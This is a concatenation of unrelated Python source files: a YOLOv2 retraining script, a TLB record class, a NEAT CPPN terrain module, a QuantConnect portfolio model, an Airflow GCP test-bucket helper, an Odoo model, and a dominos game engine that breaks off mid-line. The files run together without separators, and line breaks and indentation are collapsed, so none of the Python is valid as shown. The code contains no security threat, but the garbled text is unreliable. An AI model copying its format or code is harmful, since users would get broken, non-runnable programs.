""" This is a script that can be used to retrain the YOLOv2 model for your own dataset. """ import argparse import os import sys import matplotlib.pyplot as plt import numpy as np import PIL import tensorflow as tf from keras import backend as K from keras.layers import Input, Lambda, Conv2D from keras.models import load_model, Model from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping from yad2k.models.keras_yolo import (preprocess_true_boxes, yolo_body, yolo_eval, yolo_head, yolo_loss) from yad2k.utils.draw_boxes import draw_boxes # Args argparser = argparse.ArgumentParser( description="Retrain or 'fine-tune' a pretrained YOLOv2 model for your own data.") argparser.add_argument( '-d', '--data_path', help="path to numpy data file (.npz) containing np.object array 'boxes' and np.uint8 array 'images'", default=os.path.join('data', 'data_training_set.npz')) argparser.add_argument( '-a', '--anchors_path', help='path to anchors file, defaults to yolo_anchors.txt', default=os.path.join('model_data', 'yolo_anchors.txt')) argparser.add_argument( '-c', '--classes_path', help='path to classes file, defaults to pascal_classes.txt', default=os.path.join('model_data', 'league_classes.txt')) YOLO_ANCHORS = np.array( ((0.57273, 0.677385), (1.87446, 2.06253), (3.33843, 5.47434), (7.88282, 3.52778), (9.77052, 9.16828))) debug = False BATCH_SIZE_1 = 32 BATCH_SIZE_2 = 8 EPOCHS_1 = 5 EPOCHS_2 = 30 EPOCHS_3 = 30 if debug: BATCH_SIZE_1 = 2 BATCH_SIZE_2 = 2 EPOCHS_1 = 1 EPOCHS_2 = 1 EPOCHS_3 = 1 class TrainingData: # the dataset is broken up in to "clusters" # these are npz files with 20 games worth of data. # its not ecnomical to load the entire dataset into one npz files # our pc would most likely run of ram to allocate for the massive file. # # all_npz_files_clusters is a list paths to all the npz clusters. # i load these in on a need basis. def __init__(self, all_train_npz_clusters, all_val_npz_clusters): # set up our clusters self.all_train_npz_clusters = all_train_npz_clusters self.all_val_npz_clusters = all_val_npz_clusters # keep track of which training cluster we have loaded self.curr_train_npz_cluster = np.load(all_train_npz_clusters[0]) self.train_cluster_index = 0 # keep track of which validation cluster we have loaded self.curr_val_npz_cluster = np.load(all_val_npz_clusters[0]) self.val_cluster_index = 0 # 90% of images are training, 10% are validation. # images and boxes will simply point to the images of the cluster we are currently on self.train_images = self.curr_train_npz_cluster['images'] self.train_boxes = self.curr_train_npz_cluster['boxes'] # set up validationas images/boxes well. self.val_images = self.curr_val_npz_cluster['images'] self.val_boxes = self.curr_val_npz_cluster['boxes'] # pointers to handle the images within our batch self.train_batch_pointer = 0 self.val_batch_pointer = 0 def load_train_cluster(self): # to fix #TODO from below # left_over_images = [] # for i in range(self.train_batch_pointer, len(self.train_images)): # left_over_images.append(self.train_images[i]) # print("Leftover...") # first figure out which cluster we're moving to # mod length of all_train_npz_clusters keeps us in range self.train_cluster_index = (self.train_cluster_index + 1) % len(self.all_train_npz_clusters) # then load it print("Loading new cluster... ", self.all_train_npz_clusters[self.train_cluster_index]) self.curr_train_npz_cluster = np.load(self.all_train_npz_clusters[self.train_cluster_index]) # then append proper images/boxes self.train_images = self.curr_train_npz_cluster['images'] self.train_boxes = self.curr_train_npz_cluster['boxes'] # finally, reset training pointer self.train_batch_pointer = 0 # do same thing for val as done above for val clusters def load_val_cluster(self): self.val_cluster_index = (self.val_cluster_index + 1) % len(self.all_val_npz_clusters) self.curr_val_npz_cluster = np.load(self.all_val_npz_clusters[self.val_cluster_index]) self.val_images = self.curr_val_npz_cluster['images'] self.val_boxes = self.curr_val_npz_cluster['boxes'] self.val_batch_pointer = 0 def load_train_batch(self, batch_size): while True: # print("TBP.. ", self.train_batch_pointer) # this means we have reached the end of our cluster and need to load another. # TODO: this is sort of bad because we waste the frames left over. # ex batch size 32, cluster as 63 images, after loading first 32 images # 32 + 32 > 63, so we skip over all this precious data! if self.train_batch_pointer + batch_size > len(self.train_images): self.load_train_cluster() initial_index = self.train_batch_pointer end_index = self.train_batch_pointer + batch_size images_to_process = self.train_images[initial_index:end_index] boxes_to_process = self.train_boxes[initial_index:end_index] # print("Boxes to process... ") # print(boxes_to_process) # processed p_images, p_boxes = process_data(images_to_process, boxes_to_process) detectors_mask, matching_true_boxes = get_detector_mask(p_boxes, YOLO_ANCHORS) self.train_batch_pointer += batch_size yield [p_images, p_boxes, detectors_mask, matching_true_boxes], np.zeros(len(p_images)) def load_val_batch(self, batch_size): while True: # fix pointers if they extend to far! if self.val_batch_pointer + batch_size > len(self.val_images): self.load_val_cluster() initial_index = self.val_batch_pointer end_index = self.val_batch_pointer + batch_size images_to_process = self.val_images[initial_index:end_index] boxes_to_process = self.val_boxes[initial_index:end_index] # processed p_images, p_boxes = process_data(images_to_process, boxes_to_process) detectors_mask, matching_true_boxes = get_detector_mask(p_boxes, YOLO_ANCHORS) self.val_batch_pointer += batch_size yield [p_images, p_boxes, detectors_mask, matching_true_boxes], np.zeros(len(p_images)) # total number of batches to run for one epoch def get_train_steps(self, batch_size): print("Getting train steps...") steps = 0 for cluster in self.all_train_npz_clusters: loaded_clust = np.load(cluster) steps += len(loaded_clust['images']) print(steps / batch_size) return int(steps / batch_size) # total number of batches to run for validation def get_val_steps(self, batch_size): print("Getting val steps...") steps = 0 for cluster in self.all_val_npz_clusters: loaded_clust = np.load(cluster) steps += len(loaded_clust['images']) # return int(len(self.val_images) / batch_size) print(steps / batch_size) return int(steps / batch_size) def _main(args): data_path = os.path.expanduser(args.data_path) classes_path = os.path.expanduser(args.classes_path) anchors_path = os.path.expanduser(args.anchors_path) class_names = get_classes(classes_path) anchors = get_anchors(anchors_path) # custom data saved as a numpy file. # data = (np.load(data_path)) # easy class to handle all the data train_clusts = os.listdir('/media/student/DATA/clusters_cleaned/train/') val_clusts = os.listdir('/media/student/DATA/clusters_cleaned/val/') train_clus_clean = [] val_clus_clean = [] for folder_name in train_clusts: train_clus_clean.append('/media/student/DATA/clusters_cleaned/train/' + folder_name) for folder_name in val_clusts: val_clus_clean.append('/media/student/DATA/clusters_cleaned/val/' + folder_name) data = TrainingData(train_clus_clean, val_clus_clean) anchors = YOLO_ANCHORS model_body, model = create_model(anchors, class_names) train( model, class_names, anchors, data ) # here i just pass in the val set of images images = None boxes = None images, boxes = process_data(data.val_images[0:500], data.val_boxes[0:500]) if debug: images, boxes = process_data(data.val_images[0:10], data.val_boxes[0:10]) draw(model_body, class_names, anchors, images, image_set='val', # assumes training/validation split is 0.9 weights_name='trained_stage_3_best.h5', save_all=False) def get_classes(classes_path): '''loads the classes''' with open(classes_path) as f: class_names = f.readlines() class_names = [c.strip() for c in class_names] return class_names def get_anchors(anchors_path): '''loads the anchors from a file''' if os.path.isfile(anchors_path): with open(anchors_path) as f: anchors = f.readline() anchors = [float(x) for x in anchors.split(',')] return np.array(anchors).reshape(-1, 2) else: Warning("Could not open anchors file, using default.") return YOLO_ANCHORS def process_data(images, boxes=None): '''processes the data''' images = [PIL.Image.fromarray(i) for i in images] orig_size = np.array([images[0].width, images[0].height]) orig_size = np.expand_dims(orig_size, axis=0) # Image preprocessing. processed_images = [i.resize((416, 416), PIL.Image.BICUBIC) for i in images] processed_images = [np.array(image, dtype=np.float) for image in processed_images] processed_images = [image/255. for image in processed_images] if boxes is not None: # Box preprocessing. # Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max. boxes = [box.reshape((-1, 5)) for box in boxes] # Get extents as y_min, x_min, y_max, x_max, class for comparision with # model output. boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes] # Get box parameters as x_center, y_center, box_width, box_height, class. boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes] boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes] boxes_xy = [boxxy / orig_size for boxxy in boxes_xy] boxes_wh = [boxwh / orig_size for boxwh in boxes_wh] boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)] # find the max number of boxes max_boxes = 0 for boxz in boxes: if boxz.shape[0] > max_boxes: max_boxes = boxz.shape[0] # add zero pad for training for i, boxz in enumerate(boxes): if boxz.shape[0] < max_boxes: zero_padding = np.zeros( (max_boxes-boxz.shape[0], 5), dtype=np.float32) boxes[i] = np.vstack((boxz, zero_padding)) return np.array(processed_images), np.array(boxes) else: return np.array(processed_images) def get_detector_mask(boxes, anchors): ''' Precompute detectors_mask and matching_true_boxes for training. Detectors mask is 1 for each spatial position in the final conv layer and anchor that should be active for the given boxes and 0 otherwise. Matching true boxes gives the regression targets for the ground truth box that caused a detector to be active or 0 otherwise. ''' detectors_mask = [0 for i in range(len(boxes))] matching_true_boxes = [0 for i in range(len(boxes))] for i, box in enumerate(boxes): detectors_mask[i], matching_true_boxes[i] = preprocess_true_boxes(box, anchors, [416, 416]) return np.array(detectors_mask), np.array(matching_true_boxes) def create_model(anchors, class_names, load_pretrained=True, freeze_body=True): ''' returns the body of the model and the model # Params: load_pretrained: whether or not to load the pretrained model or initialize all weights freeze_body: whether or not to freeze all weights except for the last layer's # Returns: model_body: YOLOv2 with new output layer model: YOLOv2 with custom loss Lambda layer ''' detectors_mask_shape = (13, 13, 5, 1) matching_boxes_shape = (13, 13, 5, 5) # Create model input layers. image_input = Input(shape=(416, 416, 3)) boxes_input = Input(shape=(None, 5)) detectors_mask_input = Input(shape=detectors_mask_shape) matching_boxes_input = Input(shape=matching_boxes_shape) # Create model body. yolo_model = yolo_body(image_input, len(anchors), len(class_names)) topless_yolo = Model(yolo_model.input, yolo_model.layers[-2].output) if load_pretrained: # Save topless yolo: topless_yolo_path = os.path.join('model_data', 'yolo_topless.h5') if not os.path.exists(topless_yolo_path): print("CREATING TOPLESS WEIGHTS FILE") yolo_path = os.path.join('model_data', 'yolo.h5') model_body = load_model(yolo_path) model_body = Model(model_body.inputs, model_body.layers[-2].output) model_body.save_weights(topless_yolo_path) topless_yolo.load_weights(topless_yolo_path) if freeze_body: for layer in topless_yolo.layers: layer.trainable = False final_layer = Conv2D(len(anchors)*(5+len(class_names)), (1, 1), activation='linear')(topless_yolo.output) model_body = Model(image_input, final_layer) # Place model loss on CPU to reduce GPU memory usage. with tf.device('/cpu:0'): # TODO: Replace Lambda with custom Keras layer for loss. model_loss = Lambda( yolo_loss, output_shape=(1, ), name='yolo_loss', arguments={'anchors': anchors, 'num_classes': len(class_names)})([ model_body.output, boxes_input, detectors_mask_input, matching_boxes_input ]) model = Model( [model_body.input, boxes_input, detectors_mask_input, matching_boxes_input], model_loss) return model_body, model def train(model, class_names, anchors, data): ''' retrain/fine-tune the model logs training with tensorboard saves training weights in current directory best weights according to val_loss is saved as trained_stage_3_best.h5 ''' model.compile( optimizer='adam', loss={ 'yolo_loss': lambda y_true, y_pred: y_pred }) # This is a hack to use the custom loss function in the last layer. logging = TensorBoard() checkpoint = ModelCheckpoint("trained_stage_3_best.h5", monitor='val_loss', save_weights_only=True, save_best_only=True) early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto') print("Training on %d images " % (data.get_train_steps(BATCH_SIZE_1) * BATCH_SIZE_1)) model.fit_generator(data.load_train_batch(BATCH_SIZE_1), steps_per_epoch=data.get_train_steps(BATCH_SIZE_1), epochs=EPOCHS_1, validation_data=data.load_val_batch(BATCH_SIZE_1), validation_steps=data.get_val_steps(BATCH_SIZE_1), callbacks=[logging]) model.save_weights('trained_stage_1.h5') print("Saved!") model_body, model = create_model(anchors, class_names, load_pretrained=False, freeze_body=False) model.load_weights('trained_stage_1.h5') model.compile( optimizer='adam', loss={ 'yolo_loss': lambda y_true, y_pred: y_pred }) # This is a hack to use the custom loss function in the last layer. print("Running second....") model.fit_generator(data.load_train_batch(BATCH_SIZE_2), steps_per_epoch=data.get_train_steps(BATCH_SIZE_2), epochs=EPOCHS_2, validation_data=data.load_val_batch(BATCH_SIZE_2), validation_steps=data.get_val_steps(BATCH_SIZE_2), callbacks=[logging]) model.save_weights('trained_stage_2.h5') # yad2k calls for smaller batches here model.fit_generator(data.load_train_batch(BATCH_SIZE_2), steps_per_epoch=data.get_train_steps(BATCH_SIZE_2), epochs=EPOCHS_3, validation_data=data.load_val_batch(BATCH_SIZE_2), validation_steps=data.get_val_steps(BATCH_SIZE_2), callbacks=[logging, checkpoint, early_stopping]) model.save_weights('trained_stage_3.h5') def draw(model_body, class_names, anchors, image_data, image_set='val', weights_name='trained_stage_3_best.h5', out_path="output_images", save_all=True): ''' Draw bounding boxes on image data ''' if image_set == 'train': image_data = np.array([np.expand_dims(image, axis=0) for image in image_data[:int(len(image_data)*.9)]]) elif image_set == 'val': image_data = np.array([np.expand_dims(image, axis=0) for image in image_data[int(len(image_data)*.9):]]) elif image_set == 'all': image_data = np.array([np.expand_dims(image, axis=0) for image in image_data]) else: ValueError("draw argument image_set must be 'train', 'val', or 'all'") # model.load_weights(weights_name) print(image_data.shape) model_body.load_weights(weights_name) # Create output variables for prediction. yolo_outputs = yolo_head(model_body.output, anchors, len(class_names)) input_image_shape = K.placeholder(shape=(2, )) boxes, scores, classes = yolo_eval( yolo_outputs, input_image_shape, score_threshold=0.07, iou_threshold=0) # Run prediction on overfit image. sess = K.get_session() # TODO: Remove dependence on Tensorflow session. if not os.path.exists(out_path): os.makedirs(out_path) for i in range(len(image_data)): out_boxes, out_scores, out_classes = sess.run( [boxes, scores, classes], feed_dict={ model_body.input: image_data[i], input_image_shape: [image_data.shape[2], image_data.shape[3]], K.learning_phase(): 0 }) print('Found {} boxes for image.'.format(len(out_boxes))) print(out_boxes) # Plot image with predicted boxes. image_with_boxes = draw_boxes(image_data[i][0], out_boxes, out_classes, class_names, out_scores) # Save the image: if save_all or (len(out_boxes) > 0): image = PIL.Image.fromarray(image_with_boxes) image.save(os.path.join(out_path,str(i)+'.png')) # To display (pauses the program): # plt.imshow(image_with_boxes, interpolation='nearest') # plt.show() if __name__ == '__main__': args = argparser.parse_args() _main(args)
from permissions import Permissions from address_descriptor import AddressDescriptor from bitstring import BitArray from enum import Enum TLBRecType = Enum( "TLBRecType", "TLBRecType_SmallPage TLBRecType_LargePage TLBRecType_Section TLBRecType_Supersection TLBRecType_MMUDisabled" ) class TLBRecord(object): def __init__(self): self.perms = Permissions() self.ng = False self.domain = BitArray(length=4) self.contiguousbit = False self.level = 0 self.blocksize = 0 self.addrdesc = AddressDescriptor()
# Copyright (c) 2020 Uber Technologies, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime from collections import deque import json import neat from neat.six_util import iteritems, iterkeys import numpy as np import pickle import random import time import os import logging logger = logging.getLogger(__name__) class PrettyGenome(neat.DefaultGenome): def __init__(self, key): super().__init__(key) def __str__(self): connections = [c for c in self.connections.values() if c.enabled] connections.sort() s = "Key: {0}\nFitness: {1}\nNodes:".format(self.key, self.fitness) for k, ng in iteritems(self.nodes): s += "\n\t{0} {1!s}".format(k, ng) s += "\nConnections:" for c in connections: s += "\n\t" + str(c) return s class CppnEnvParams: x = np.array([(i - 200 / 2.0) / (200 / 2.0) for i in range(200)]) def __init__(self, cppn_config_path='config-cppn', genome_path=None): self.cppn_config_path = os.path.dirname(__file__) + '/' + cppn_config_path self.genome_path = genome_path self.hardcore = False self.cppn_config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, self.cppn_config_path) self.cppn_genome = None self.altitude_fn = lambda x: x if genome_path is not None: self.cppn_genome = pickle.load(open(genome_path, 'rb')) else: start_cppn_genome = PrettyGenome('0') start_cppn_genome.configure_new(self.cppn_config.genome_config) start_cppn_genome.nodes[0].activation = 'identity' self.cppn_genome = start_cppn_genome self.reset_altitude_fn() def reset_altitude_fn(self): net = neat.nn.FeedForwardNetwork.create(self.cppn_genome, self.cppn_config) self.altitude_fn = net.activate def get_mutated_params(self): is_valid = False while not is_valid: mutated = copy_genome(self.cppn_genome) mutated.nodes[0].response = 1.0 mutated.key = datetime.datetime.utcnow().isoformat() mutated.mutate(self.cppn_config.genome_config) is_valid = is_genome_valid(mutated) & (self.cppn_genome.distance(mutated, self.cppn_config.genome_config) > 0) if not is_valid: continue net = neat.nn.FeedForwardNetwork.create(mutated, self.cppn_config) y = np.array([net.activate((xi, )) for xi in self.x]) y -= y[0] # normalize to start at altitude 0 threshold_ = np.abs(np.max(y)) is_valid = (threshold_ > 0) if not is_valid: continue if threshold_ < 0.25: mutated.nodes[0].response = (np.random.random() / 2 + 0.25) / threshold_ if threshold_ > 16: mutated.nodes[0].response = (np.random.random() * 4 + 12) / threshold_ res = CppnEnvParams() res.cppn_genome = mutated res.reset_altitude_fn() return res def save_xy(self, folder='/tmp'): with open(folder + '/' + self.cppn_genome.key + '_xy.json', 'w') as f: net = neat.nn.FeedForwardNetwork.create(self.cppn_genome, self.cppn_config) y = np.array([net.activate((xi, )) for xi in self.x]) f.write(json.dumps({'x': self.x.tolist(), 'y': y.tolist()})) def to_json(self): return json.dumps({ 'cppn_config_path': self.cppn_config_path, 'genome_path': self.genome_path, }) def save_genome(self): file_path = '/tmp/genome_{}_saved.pickle'.format(time.time()) pickled = pickle.dump(self.cppn_genome, open(file_path, 'wb')) def copy_genome(genome): file_path = '/tmp/genome_{}.pickle'.format(time.time()) pickled = pickle.dump(genome, open(file_path, 'wb')) return pickle.load(open(file_path, 'rb')) def is_genome_valid(g): graph = {} for key in g.connections.keys(): if key[0] not in graph: graph[key[0]] = [] graph[key[0]].append(key[1]) q = deque([-1]) while len(q) > 0: cur = q.popleft() if cur == 0: return True if cur not in graph: continue for node in graph[cur]: q.append(node) return False
from datetime import datetime, timedelta import pytz from collections import defaultdict from itertools import groupby class MarketCapWeightedPortfolioConstructionModel(PortfolioConstructionModel): def __init__(self): self.marketCapDict = {} self.removedSymbols = [] self.insightCollection = InsightCollection() self.nextExpiryTime = datetime.min.replace(tzinfo=pytz.utc) self.rebalanceFreq = timedelta(30) self.securities = {} self.maxWeight = .1 self.minWeight = .01 def CreateTargets(self, algorithm, insights): targets = [] if not self.ShouldCreateTargets(algorithm.UtcTime, insights): return targets self.insightCollection.AddRange(insights) targets.extend(self.CreateZeroQuantityTargetsForRemovedSecurities()) targets.extend(self.CreateZeroQuantityTargetsForExpiredInsights(algorithm)) lastActiveInsights = self.GetLastActiveInsights(algorithm) if self.ShouldUpdateTargetPercent(algorithm, lastActiveInsights): weights = self.DetermineTargetPercent(algorithm, lastActiveInsights) targets.extend([PortfolioTarget.Percent(algorithm, symbol, weight) for symbol, weight in weights.items()]) self.UpdateNextExpiryTime(algorithm) return targets def ShouldCreateTargets(self, time, insights): return len(insights) > 0 or (time > self.nextExpiryTime) def CreateZeroQuantityTargetsForRemovedSecurities(self): if len(self.removedSymbols) == 0: return [] zeroTargets = [PortfolioTarget(symbol, 0) for symbol in self.removedSymbols] self.insightCollection.Clear(self.removedSymbols) self.removedSymbols = [] return zeroTargets def CreateZeroQuantityTargetsForExpiredInsights(self, algorithm): zeroTargets = [] expiredInsights = self.insightCollection.RemoveExpiredInsights(algorithm.UtcTime) if len(expiredInsights) == 0: return zeroTargets key = lambda insight: insight.Symbol for symbol, _ in groupby(sorted(expiredInsights, key=key), key): if not self.insightCollection.HasActiveInsights(symbol, algorithm.UtcTime): zeroTargets.append(PortfolioTarget(symbol, 0)) continue return zeroTargets def GetLastActiveInsights(self, algorithm): activeInsights = self.insightCollection.GetActiveInsights(algorithm.UtcTime) lastActiveInsights = [] groupedInsights = GroupBy(activeInsights, key = lambda insight: (insight.Symbol, insight.SourceModel)) for kvp in groupedInsights: lastActiveInsights.append(sorted(kvp[1], key=lambda insight: insight.GeneratedTimeUtc)[-1]) return lastActiveInsights def ShouldUpdateTargetPercent(self, algorithm, lastActiveInsights): if algorithm.UtcTime > self.nextExpiryTime: return True for insight in lastActiveInsights: if insight.Direction != InsightDirection.Flat and not algorithm.Portfolio[insight.Symbol].Invested: return True elif insight.Direction != InsightDirection.Up and algorithm.Portfolio[insight.Symbol].IsLong: return True elif insight.Direction != InsightDirection.Down and algorithm.Portfolio[insight.Symbol].IsShort: return True else: continue return False def UpdateNextExpiryTime(self, algorithm): self.nextExpiryTime = self.insightCollection.GetNextExpiryTime() if self.nextExpiryTime is None: self.nextExpiryTime = algorithm.UtcTime + self.rebalanceFreq def DetermineTargetPercent(self, algorithm, lastActiveInsights): weights = {} if not lastActiveInsights: return weights marketCapBySymbol = {insight.Symbol : algorithm.Securities[insight.Symbol].Fundamentals.MarketCap if insight.Direction == InsightDirection.Up else 0 for insight in lastActiveInsights if insight.Symbol in self.securities} aggregatedMarketCap = sum(marketCapBySymbol.values()) weights = {symbol : min(self.maxWeight, round(mktCap/aggregatedMarketCap, 5)) for symbol, mktCap in marketCapBySymbol.items()} weights.update({symbol : max(self.minWeight, weight) for symbol, weight in weights.items() if weight > 0}) return weights def OnSecuritiesChanged(self, algorithm, changes): for security in changes.RemovedSecurities: symbol = security.Symbol self.removedSymbols.append(symbol) self.securities.pop(symbol, None) for security in changes.AddedSecurities: if security.Fundamentals is not None and security.Fundamentals.MarketCap > 0: self.securities[security.Symbol] = security def GroupBy(iterable, key=lambda x: x): d = defaultdict(list) for item in iterable: d[key(item)].append(item) return d.items()
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import argparse import os from tests.contrib.utils.logging_command_executor import LoggingCommandExecutor from tests.providers.google.cloud.utils.gcp_authenticator import GCP_GCS_KEY, GcpAuthenticator SERVICE_EMAIL_FORMAT = "project-%s@storage-transfer-service.iam.gserviceaccount.com" GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "example-project") TARGET_BUCKET_NAME = os.environ.get("GCP_SPEECH_TEST_BUCKET", "gcp-speech-test-bucket") class GCPTextToSpeechTestHelper(LoggingCommandExecutor): def create_target_bucket(self): self.execute_cmd(["gsutil", "mb", "-p", GCP_PROJECT_ID, "gs://%s/" % TARGET_BUCKET_NAME]) def delete_target_bucket(self): self.execute_cmd(["gsutil", "rm", "-r", "gs://%s/" % TARGET_BUCKET_NAME], True) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Create and delete bucket for system tests.") parser.add_argument( "--action", dest="action", required=True, choices=("create-target-bucket", "delete-target-bucket", "before-tests", "after-tests"), ) action = parser.parse_args().action helper = GCPTextToSpeechTestHelper() gcp_authenticator = GcpAuthenticator(GCP_GCS_KEY) helper.log.info("Starting action: {}".format(action)) gcp_authenticator.gcp_store_authentication() try: gcp_authenticator.gcp_authenticate() if action == "before-tests": helper.create_target_bucket() elif action == "after-tests": helper.delete_target_bucket() elif action == "create-target-bucket": helper.create_target_bucket() elif action == "delete-target-bucket": helper.delete_target_bucket() else: raise Exception("Unknown action: {}".format(action)) finally: gcp_authenticator.gcp_restore_authentication() helper.log.info("Finishing action: {}".format(action))
from socketIO_client import SocketIO, BaseNamespace class Handlers(BaseNamespace): def on_message_from_server(self, msg): print("Incoming msg: %s" % msg) io = SocketIO('localhost', 9090, Handlers, resource="api/v1/socket") io.emit('hello_from_client') io.wait(seconds=10)
#! /usr/bin/env python3 # -*- coding: utf-8 -*- import csv import unittest from fedora import utils class TestUtils(unittest.TestCase): def test_parse_to_date(self): w3 = utils.as_w3c_datetime("2016-12-12") self.assertEqual("2016-12-11T23:00Z", w3) w3 = utils.as_w3c_datetime("Wed, 21 Dec 2016 12:31:38 GMT") self.assertEqual("2016-12-21T12:31:38Z", w3) # ValueError err = utils.as_w3c_datetime("123456789") self.assertEqual("Error: 123456789", err) @unittest.skip("not a test") def test_csv_dialects(self): print(csv.list_dialects()) # ['excel-tab', 'excel', 'unix'] # if you want the standard RFC4180 then roll your own.
from .parser import Parser from .parse_result import ParseResult from .nodes import *
''' Created on 29 nov. 2019 @author: usuario ''' from odoo import api, fields, models class mecanico(models.Model): _name = "upocar.mecanico" _rec_name = "nombre_apellidos" nombre = fields.Char("Nombre", size=32, required=True) apellidos = fields.Char("Apellidos", size=64, required=True) especialidad = fields.Char("Especialidad", size=64, required=True) num_reparaciones = fields.Integer(string="Número de reparaciones", compute="_compute_num_reparaciones", store=True) reparacion_ids = fields.Many2many("upocar.reparacion", string="Reparaciones") taller_id = fields.Many2one("upocar.taller", string="Taller", required=True) nombre_apellidos = fields.Char(compute="_compute_nombre_apellidos") @api.depends("nombre", "apellidos") def _compute_nombre_apellidos(self): for record in self: record.nombre_apellidos = record.nombre + " " + record.apellidos @api.depends("reparacion_ids") def _compute_num_reparaciones(self): for record in self: if(record.reparacion_ids): record.num_reparaciones = len(record.reparacion_ids)
"""A game engine for running a game of Dominos.""" import sys, random, json, time sys.path.insert(0, '..') # For importing app config, required for using db from dominos.Config import Config from dominos.classes.Board import Board from dominos.classes.Pack import Pack from dominos.classes.Player import Player class Engine: def __init__(self, whisper_f=None, shout_f=None, query_f=None, **kwargs): self.config = Config(**kwargs) self.n_players = self.config.n_players self.hand_size = self.config.hand_size self.win_threshold = self.config.win_threshold self.check_5_doubles = self.config.check_5_doubles self.players = [] self.board = None self.pack = None for i in range(self.n_players): self.players.append(Player(i)) self.current_player = None self.n_passes = 0 if None in [shout_f, whisper_f, query_f]: raise ValueError("Must specify both shout, whisper, and retrieve functions or omit all") self.local = shout_f is None self.shout_f = shout_f self.whisper_f = whisper_f self.query_f = query_f def run_game(self): """Start and run a game until completion, handling game logic as necessary.""" self.show_scores() next_round_fresh = self.play_round(fresh_round=True) while not self.game_is_over(): next_round_fresh = self.play_round(next_round_fresh) scores = self.get_scores(indexed=False) winner = scores.index(max(scores)) self.shout("Game is over!\n\nPlayer {} wins!".format(winner)) self.shout("", "game_over") return winner def play_round(self, fresh_round=False): self.board = Board() self.draw_hands(fresh_round) self.shout("", "clear_board") if fresh_round: self.current_player = self.determine_first_player() blocked = False play_fresh = fresh_round while self.players_have_dominos() and not blocked and not self.game_is_over(): blocked = self.play_turn(play_fresh) self.next_turn() self.show_scores() play_fresh = False if not self.players_have_dominos(): # Reverse current player switch self.current_player = (self.current_player + self.n_players - 1) % self.n_players self.players[self.current_player].add_points(self.get_value_on_domino(self.current_player)) print(f"Player {self.current_player} dominoed!") self.show_scores() return False elif blocked: print("Game blocked!") blocked_scorer, points = self.get_blocked_result() if blocked_scorer is not None: print(f"Player {blocked_scorer} scores {points}") self.players[blocked_scorer].add_points(points) self.show_scores() return True else: # Game is over return False def play_turn(self, play_fresh=False): domino, direction = self.query_move(self.current_player, play_fresh) if domino is not None: self.board.add_domino(domino, direction) if not self.local: self.shout(json.dumps(self.get_placement_rep(domino, direction)), "add_domino") time.sleep(0) self.players[self.current_player].remove_domino(domino) self.whisper(self.players[self.current_player].get_hand_JSON(), self.current_player, "hand") score = self.board.score_board() self.players[self.current_player].add_points(score) self.n_passes = 0 else: # Player passes self.n_passes += 1 if self.n_passes == self.n_players: return True print(self.board) return False def next_turn(self) -> None: """Update the player to move.""" self.current_player = (self.current_player + 1) % self.n_players def draw_hands(self, fresh_round=False): while True: self.pack = Pack() hands = [] for i in range(self.n_players): hands.append(self.pack.pull(self.hand_size)) if self.verify_hands(hands, check_any_double=fresh_round, check_5_doubles=self.check_5_doubles): for i in range(self.n_players): self.players[i].assign_hand(hands[i]) self.whisper(self.players[i].get_hand_JSON(), i, "hand") return def verify_hands(self, hands, check_5_doubles=True, check_any_double=False): if not check_5_doubles and not check_any_double: return True # Check that no hand has 5 doubles no_doubles = True for hand in hands: n_doubles = len([d for d in hand if d.is_double()]) if check_5_doubles: if n_doubles >= 5: return False if n_doubles > 0: no_doubles = False # Check that some hand has a double if check_any_double: if no_doubles: return False return True def determine_first_player(self): """Determine who has the largest double, and thus who will play first. Assumes each player's hand is assigned and a double exists among them.""" for i in range(6, -1, -1): for p in range(self.n_players): for d in self.players[p].get_hand(): if d.equals(i, i): return p raise Exception("Could not find double in player's hands") def players_have_dominos(self): return min([len(p.get_hand()) for p in self.players]) > 0 def game_is_over(self): return max(self.get_scores(indexed=False)) >= self.win_threshold def get_scores(self, indexed=True): if indexed: return {i: self.get_player_score(i) for i in range(len(self.players))} else: return [self.get_player_score(i) for i in range(len(self.players))] def get_player_score(self, player): return self.players[player].get_score() def query_move(self, player, play_fresh=False): while True: possible_placements = self.board.get_valid_placements_for_hand(self.players[player].get_hand(), play_fresh) pretty_placements = [(x[0], str(x[1]), x[2]) for x in possible_placements] print("Possible placements:") for el in pretty_placements: print(" --- " + str(el)) if not self.local: playable_dominos = [i for i in range(len(pretty_placements)) if len(pretty_placements[i][2]) > 0] self.whisper(str(playable_dominos), player, "playable_dominos") move_possible = any([len(t[-1]) > 0 for t in possible_placements]) if move_possible: try: query_msg = f"Player {player}, what domino do you select?\n" if self.local: domino_index = int(input(query_msg).strip()) else: self.whisper(query_msg, player, "prompt") response = self.get_response(player) domino_index = int(response) if not (0 <= domino_index < len(possible_placements)) or len(possible_placements[domino_index][-1]) == 0: self.whisper("Invalid domino choice: " + str(domino_index), player, "error") else: domino = possible_placements[domino_index][1] if len(possible_placements[domino_index][-1]) == 1: direction = possible_placements[domino_index][-1][0] return domino, direction else: while True: query_msg = f"Player {player}, what direction do you select?\n" if self.local: direction = input(query_msg).strip() else: self.whisper(query_msg, 